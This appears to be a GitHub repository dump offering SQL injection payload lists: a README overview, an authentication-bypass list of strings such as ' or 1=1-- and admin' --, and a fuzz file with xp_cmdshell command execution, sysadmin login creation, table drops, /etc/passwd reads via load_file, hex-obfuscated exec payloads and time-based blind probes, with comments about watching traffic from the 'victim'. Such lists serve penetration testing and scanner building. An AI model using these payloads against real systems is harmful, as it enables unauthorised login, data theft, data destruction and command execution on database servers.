├── LICENSE ├── README.md ├── SQL-Auth-Bypass.txt └── SQL-Inj-Payload.txt /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2019 Omur UGUR 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 |
3 |

SQL Injection Vulnerability Payload List

4 |

5 | 6 | 7 | 8 | 9 |

10 | 11 | 12 | Donate using Liberapay 13 | 14 | 15 | 16 | 17 | Overview: 18 | 19 | A SQL injection attack consists of insertion or "injection" of a SQL query 20 | via the input data from the client to the application. A successful SQL injection exploit 21 | can read sensitive data from the database, modify database data (Insert/Update/Delete), 22 | execute administration operations on the database (such as shutdown the DBMS), recover the content of a 23 | given file present on the DBMS file system and in some cases issue commands to the operating system. 24 | SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order 25 | to effect the execution of predefined SQL commands. 26 | 27 |

References

28 | 29 | 30 | • SQL Injection point_right https://www.owasp.org/index.php/SQL_Injection 31 | 32 | 33 |

Download

34 | 35 |
Cloning an Existing Repository ( Clone with HTTPS )
36 |

37 | root@slife:~# git clone https://github.com/omurugur/SQL_Injection_Payload.git
38 | 
39 |
Cloning an Existing Repository ( Clone with SSH )
40 |

41 | root@slife:~# git clone git@github.com:omurugur/SQL_Injection_Payload.git
42 | 
43 | 44 | 45 |

Contact

46 | 47 |
Mail : omurugur12@gmail.com
48 | 49 |
Linkedin : https://www.linkedin.com/in/omurugur-sibergüvenlik/
50 | 51 |
GitHub : https://github.com/omurugur
52 | 53 |
Twitter : https://twitter.com/omurugurrr
54 | 55 |
Medium : https://omurugur.medium.com/
56 | 57 |
Donate!
58 |

59 | Support the authors: 60 | -------------------------------------------------------------------------------- /SQL-Auth-Bypass.txt: -------------------------------------------------------------------------------- 1 | '-' 2 | ' ' 3 | '&' 4 | '^' 5 | '*' 6 | ' or ''-' 7 | ' or '' ' 8 | ' or ''&' 9 | ' or ''^' 10 | ' or ''*' 11 | "-" 12 | " " 13 | "&" 14 | "^" 15 | "*" 16 | " or ""-" 17 | " or "" " 18 | " or ""&" 19 | " or ""^" 20 | " or ""*" 21 | or true-- 22 | " or true-- 23 | ' or true-- 24 | ") or true-- 25 | ') or true-- 26 | ' or 'x'='x 27 | ') or ('x')=('x 28 | ')) or (('x'))=(('x 29 | " or "x"="x 30 | ") or ("x")=("x 31 | ")) or (("x"))=(("x 32 | or 1=1 33 | or 1=1-- 34 | or 1=1# 35 | or 1=1/* 36 | admin' -- 37 | admin' # 38 | admin'/* 39 | admin' or '1'='1 40 | admin' or '1'='1'-- 41 | admin' or '1'='1'# 42 | admin' or '1'='1'/* 43 | admin'or 1=1 or ''=' 44 | admin' or 1=1 45 | admin' or 1=1-- 46 | admin' or 1=1# 47 | admin' or 1=1/* 48 | admin') or ('1'='1 49 | admin') or ('1'='1'-- 50 | admin') or ('1'='1'# 51 | admin') or ('1'='1'/* 52 | admin') or '1'='1 53 | admin') or '1'='1'-- 54 | admin') or '1'='1'# 55 | admin') or '1'='1'/* 56 | 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 57 | admin" -- 58 | admin" # 59 | admin"/* 60 | admin" or "1"="1 61 | admin" or "1"="1"-- 62 | admin" or "1"="1"# 63 | admin" or "1"="1"/* 64 | admin"or 1=1 or ""=" 65 | admin" or 1=1 66 | admin" or 1=1-- 67 | admin" or 1=1# 68 | admin" or 1=1/* 69 | admin") or ("1"="1 70 | admin") or ("1"="1"-- 71 | admin") or ("1"="1"# 72 | admin") or ("1"="1"/* 73 | admin") or "1"="1 74 | admin") or "1"="1"-- 75 | admin") or "1"="1"# 76 | admin") or "1"="1"/* 77 | 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 78 | == 79 | = 80 | ' 81 | ' -- 82 | ' # 83 | ' – 84 | '-- 85 | '/* 86 | '# 87 | " -- 88 | " # 89 | "/* 90 | ' and 1='1 91 | ' and a='a 92 | or 1=1 93 | or true 94 | ' or ''=' 95 | " or ""=" 96 | 1′) and '1′='1– 97 | ' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055 98 | " AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055 99 | and 1=1 100 | and 1=1– 101 | ' and 'one'='one 102 | ' and 'one'='one– 103 | ' group by password having 1=1-- 104 | ' group by userid having 1=1-- 105 | ' group by username having 1=1-- 106 | like '%' 107 | or 0=0 -- 108 | or 0=0 # 109 | or 0=0 – 110 | ' or 0=0 # 111 | ' or 0=0 -- 112 | ' or 0=0 # 113 | ' or 0=0 – 114 | " or 0=0 -- 115 | " or 0=0 # 116 | " or 0=0 – 117 | %' or '0'='0 118 | or 1=1 119 | or 1=1-- 120 | or 1=1/* 121 | or 1=1# 122 | or 1=1– 123 | ' or 1=1-- 124 | ' or '1'='1 125 | ' or '1'='1'-- 126 | ' or '1'='1'/* 127 | ' or '1'='1'# 128 | ' or '1′='1 129 | ' or 1=1 130 | ' or 1=1 -- 131 | ' or 1=1 – 132 | ' or 1=1-- 133 | ' or 1=1;# 134 | ' or 1=1/* 135 | ' or 1=1# 136 | ' or 1=1– 137 | ') or '1'='1 138 | ') or '1'='1-- 139 | ') or '1'='1'-- 140 | ') or '1'='1'/* 141 | ') or '1'='1'# 142 | ') or ('1'='1 143 | ') or ('1'='1-- 144 | ') or ('1'='1'-- 145 | ') or ('1'='1'/* 146 | ') or ('1'='1'# 147 | 'or'1=1 148 | 'or'1=1′ 149 | " or "1"="1 150 | " or "1"="1"-- 151 | " or "1"="1"/* 152 | " or "1"="1"# 153 | " or 1=1 154 | " or 1=1 -- 155 | " or 1=1 – 156 | " or 1=1-- 157 | " or 1=1/* 158 | " or 1=1# 159 | " or 1=1– 160 | ") or "1"="1 161 | ") or "1"="1"-- 162 | ") or "1"="1"/* 163 | ") or "1"="1"# 164 | ") or ("1"="1 165 | ") or ("1"="1"-- 166 | ") or ("1"="1"/* 167 | ") or ("1"="1"# 168 | ) or '1′='1– 169 | ) or ('1′='1– 170 | ' or 1=1 LIMIT 1;# 171 | 'or 1=1 or ''=' 172 | "or 1=1 or ""=" 173 | ' or 'a'='a 174 | ' or a=a-- 175 | ' or a=a– 176 | ') or ('a'='a 177 | " or "a"="a 178 | ") or ("a"="a 179 | ') or ('a'='a and hi") or ("a"="a 180 | ' or 'one'='one 181 | ' or 'one'='one– 182 | ' or uid like '% 183 | ' or uname like '% 184 | ' or userid like '% 185 | ' or user like '% 186 | ' or username like '% 187 | ' or 'x'='x 188 | ') or ('x'='x 189 | " or "x"="x 190 | ' OR 'x'='x'#; 191 | '=' 'or' and '=' 'or' 192 | ' UNION ALL SELECT 1, @@version;# 193 | ' UNION ALL SELECT system_user(),user();# 194 | ' UNION select table_schema,table_name FROM information_Schema.tables;# 195 | admin' and substring(password/text(),1,1)='7 196 | ' and substring(password/text(),1,1)='7 197 | -------------------------------------------------------------------------------- /SQL-Inj-Payload.txt: -------------------------------------------------------------------------------- 1 | # ms-sqli info disclosure payload fuzzfile 2 | # replace regex with your fuzzer for best results 3 | # run wireshark or tcpdump, look for incoming smb or icmp packets from victim 4 | # might need to terminate payloads with ;-- 5 | select @@version 6 | select @@servernamee 7 | select @@microsoftversione 8 | select * from master..sysserverse 9 | select * from sysusers 10 | exec master..xp_cmdshell 'ipconfig+/all' 11 | exec master..xp_cmdshell 'net+view' 12 | exec master..xp_cmdshell 'net+users' 13 | exec master..xp_cmdshell 'ping+' 14 | BACKUP database master to disks='\\\\backupdb.dat' 15 | create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.aspâ'" select * from myfile"-- 16 | # you will need to customize/modify some of the vaules in the queries for best effect 17 | '; exec master..xp_cmdshell 'ping 10.10.1.2'-- 18 | 'create user name identified by 'pass123' -- 19 | 'create user name identified by pass123 temporary tablespace temp default tablespace users; 20 | ' ; drop table temp -- 21 | 'exec sp_addlogin 'name' , 'password' -- 22 | ' exec sp_addsrvrolemember 'name' , 'sysadmin' -- 23 | ' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) -- 24 | ' grant connect to name; grant resource to name; -- 25 | ' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64) 26 | ' or 1=1 -- 27 | ' union (select @@version) -- 28 | ' union (select NULL, (select @@version)) -- 29 | ' union (select NULL, NULL, (select @@version)) -- 30 | ' union (select NULL, NULL, NULL, (select @@version)) -- 31 | ' union (select NULL, NULL, NULL, NULL, (select @@version)) -- 32 | ' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) -- 33 | 1'1 34 | 1 exec sp_ (or exec xp_) 35 | 1 and 1=1 36 | 1' and 1=(select count(*) from tablenames); -- 37 | 1 or 1=1 38 | 1' or '1'='1 39 | 40 | )%20or%20('x'='x 41 | %20or%201=1 42 | ; execute immediate 'sel' || 'ect us' || 'er' 43 | benchmark(10000000,MD5(1))# 44 | update 45 | ";waitfor delay '0:0:__TIME__'-- 46 | 1) or pg_sleep(__TIME__)-- 47 | ||(elt(-3+5,bin(15),ord(10),hex(char(45)))) 48 | "hi"") or (""a""=""a" 49 | delete 50 | like 51 | " or sleep(__TIME__)# 52 | pg_sleep(__TIME__)-- 53 | *(|(objectclass=*)) 54 | declare @q nvarchar (200) 0x730065006c00650063 ... 55 | or 0=0 # 56 | insert 57 | 1) or sleep(__TIME__)# 58 | ) or ('a'='a 59 | ; exec xp_regread 60 | *| 61 | @var select @var as var into temp end -- 62 | 1)) or benchmark(10000000,MD5(1))# 63 | asc 64 | (||6) 65 | "a"" or 3=3--" 66 | " or benchmark(10000000,MD5(1))# 67 | # from wapiti 68 | or 0=0 -- 69 | 1 waitfor delay '0:0:10'-- 70 | or 'a'='a 71 | hi or 1=1 --" 72 | or a = a 73 | UNION ALL SELECT 74 | ) or sleep(__TIME__)=' 75 | )) or benchmark(10000000,MD5(1))# 76 | hi' or 'a'='a 77 | 0 78 | 21 % 79 | limit 80 | or 1=1 81 | or 2 > 1 82 | ")) or benchmark(10000000,MD5(1))# 83 | PRINT 84 | hi') or ('a'='a 85 | or 3=3 86 | ));waitfor delay '0:0:__TIME__'-- 87 | a' waitfor delay '0:0:10'-- 88 | 1;(load_file(char(47,101,116,99,47,112,97,115, ... 89 | or%201=1 90 | 1 or sleep(__TIME__)# 91 | or 1=1 92 | and 1 in (select var from temp)-- 93 | or '7659'='7659 94 | or 'text' = n'text' 95 | -- 96 | or 1=1 or ''=' 97 | declare @s varchar (200) select @s = 0x73656c6 ... 98 | exec xp 99 | ; exec master..xp_cmdshell 'ping 172.10.1.255'-- 100 | 3.10E+17 101 | " or pg_sleep(__TIME__)-- 102 | x' AND email IS NULL; -- 103 | & 104 | admin' or ' 105 | or 'unusual' = 'unusual' 106 | // 107 | truncate 108 | 1) or benchmark(10000000,MD5(1))# 109 | \x27UNION SELECT 110 | declare @s varchar(200) select @s = 0x77616974 ... 111 | tz_offset 112 | sqlvuln 113 | "));waitfor delay '0:0:__TIME__'-- 114 | ||6 115 | or%201=1 -- 116 | %2A%28%7C%28objectclass%3D%2A%29%29 117 | or a=a 118 | ) union select * from information_schema.tables; 119 | PRINT @@variable 120 | or isNULL(1/0) /* 121 | 26 % 122 | " or "a"="a 123 | (sqlvuln) 124 | x' AND members.email IS NULL; -- 125 | or 1=1-- 126 | and 1=( if((load_file(char(110,46,101,120,11 ... 127 | 0x770061006900740066006F0072002000640065006C00 ... 128 | %20'sleep%2050' 129 | as 130 | 1)) or pg_sleep(__TIME__)-- 131 | /**/or/**/1/**/=/**/1 132 | union all select @@version-- 133 | ,@variable 134 | (sqlattempt2) 135 | or (EXISTS) 136 | t'exec master..xp_cmdshell 'nslookup www.googl ... 137 | %20$(sleep%2050) 138 | 1 or benchmark(10000000,MD5(1))# 139 | %20or%20''=' 140 | ||UTL_HTTP.REQUEST 141 | or pg_sleep(__TIME__)-- 142 | hi' or 'x'='x'; 143 | ") or sleep(__TIME__)=" 144 | or 'whatever' in ('whatever') 145 | ; begin declare @var varchar(8000) set @var=' ... 146 | union select 1,load_file('/etc/passwd'),1,1,1; 147 | 0x77616974666F722064656C61792027303A303A313027 ... 148 | exec(@s) 149 | ) or pg_sleep(__TIME__)-- 150 | union select 151 | or sleep(__TIME__)# 152 | select * from information_schema.tables-- 153 | a' or 1=1-- 154 | a' or 'a' = 'a 155 | declare @s varchar(22) select @s = 156 | or 2 between 1 and 3 157 | or a=a-- 158 | or '1'='1 159 | | 160 | or sleep(__TIME__)=' 161 | or 1 --' 162 | or 0=0 #" 163 | having 164 | a' 165 | " or isNULL(1/0) /* 166 | declare @s varchar (8000) select @s = 0x73656c ... 167 | ‘ or 1=1 -- 168 | char%4039%41%2b%40SELECT 169 | order by 170 | bfilename 171 | having 1=1-- 172 | ) or benchmark(10000000,MD5(1))# 173 | or username like char(37); 174 | ;waitfor delay '0:0:__TIME__'-- 175 | " or 1=1-- 176 | x' AND userid IS NULL; -- 177 | */* 178 | or 'text' > 't' 179 | (select top 1 180 | or benchmark(10000000,MD5(1))# 181 | ");waitfor delay '0:0:__TIME__'-- 182 | a' or 3=3-- 183 | -- &password= 184 | group by userid having 1=1-- 185 | or ''=' 186 | ; exec master..xp_cmdshell 187 | %20or%20x=x 188 | select 189 | ")) or sleep(__TIME__)=" 190 | 0x730065006c0065006300740020004000400076006500 ... 191 | hi' or 1=1 -- 192 | ") or pg_sleep(__TIME__)-- 193 | %20or%20'x'='x 194 | or 'something' = 'some'+'thing' 195 | exec sp 196 | 29 % 197 | ( 198 | ý or 1=1 -- 199 | 1 or pg_sleep(__TIME__)-- 200 | 0 or 1=1 201 | ) or (a=a 202 | uni/**/on sel/**/ect 203 | replace 204 | %27%20or%201=1 205 | )) or pg_sleep(__TIME__)-- 206 | %7C 207 | x' AND 1=(SELECT COUNT(*) FROM tabname); -- 208 | '%20OR 209 | ; or '1'='1' 210 | declare @q nvarchar (200) select @q = 0x770061 ... 211 | 1 or 1=1 212 | ; exec ('sel' + 'ect us' + 'er') 213 | 23 OR 1=1 214 | / 215 | anything' OR 'x'='x 216 | declare @q nvarchar (4000) select @q = 217 | or 0=0 -- 218 | desc 219 | ||'6 220 | ) 221 | 1)) or sleep(__TIME__)# 222 | or 0=0 # 223 | select name from syscolumns where id = (sele ... 224 | hi or a=a 225 | *(|(mail=*)) 226 | password:*/=1-- 227 | distinct 228 | );waitfor delay '0:0:__TIME__'-- 229 | to_timestamp_tz 230 | ") or benchmark(10000000,MD5(1))# 231 | UNION SELECT 232 | %2A%28%7C%28mail%3D%2A%29%29 233 | +sqlvuln 234 | or 1=1 /* 235 | )) or sleep(__TIME__)=' 236 | or 1=1 or ""= 237 | or 1 in (select @@version)-- 238 | sqlvuln; 239 | union select * from users where login = char ... 240 | x' or 1=1 or 'x'='y 241 | 28 % 242 | ‘ or 3=3 -- 243 | @variable 244 | or '1'='1'-- 245 | "a"" or 1=1--" 246 | //* 247 | %2A%7C 248 | " or 0=0 -- 249 | ")) or pg_sleep(__TIME__)-- 250 | ? 251 | or 1/* 252 | ! 253 | ' 254 | or a = a 255 | declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q) 256 | declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) 257 | declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) 258 | declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s) 259 | ' or 1=1 260 |  or 1=1 -- 261 | x' OR full_name LIKE '%Bob% 262 | '; exec master..xp_cmdshell 'ping 172.10.1.255'-- 263 | '%20or%20''=' 264 | '%20or%20'x'='x 265 | ')%20or%20('x'='x 266 | ' or 0=0 -- 267 | ' or 0=0 # 268 | or 0=0 #" 269 | ' or 1=1-- 270 | ' or '1'='1'-- 271 | ' or 1 --' 272 | or 1=1-- 273 | ' or 1=1 or ''=' 274 | or 1=1 or ""= 275 | ' or a=a-- 276 | or a=a 277 | ') or ('a'='a 278 | 'hi' or 'x'='x'; 279 | or 280 | procedure 281 | handler 282 | ' or username like '% 283 | ' or uname like '% 284 | ' or userid like '% 285 | ' or uid like '% 286 | ' or user like '% 287 | '; exec master..xp_cmdshell 288 | '; exec xp_regread 289 | t'exec master..xp_cmdshell 'nslookup www.google.com'-- 290 | --sp_password 291 | ' UNION SELECT 292 | ' UNION ALL SELECT 293 | ' or (EXISTS) 294 | ' (select top 1 295 | '||UTL_HTTP.REQUEST 296 | 1;SELECT%20* 297 | <>"'%;)(&+ 298 | '%20or%201=1 299 | 'sqlattempt1 300 | %28 301 | %29 302 | %26 303 | %21 304 | ' or ''=' 305 | ' or 3=3 306 |  or 3=3 -- 307 | --------------------------------------------------------------------------------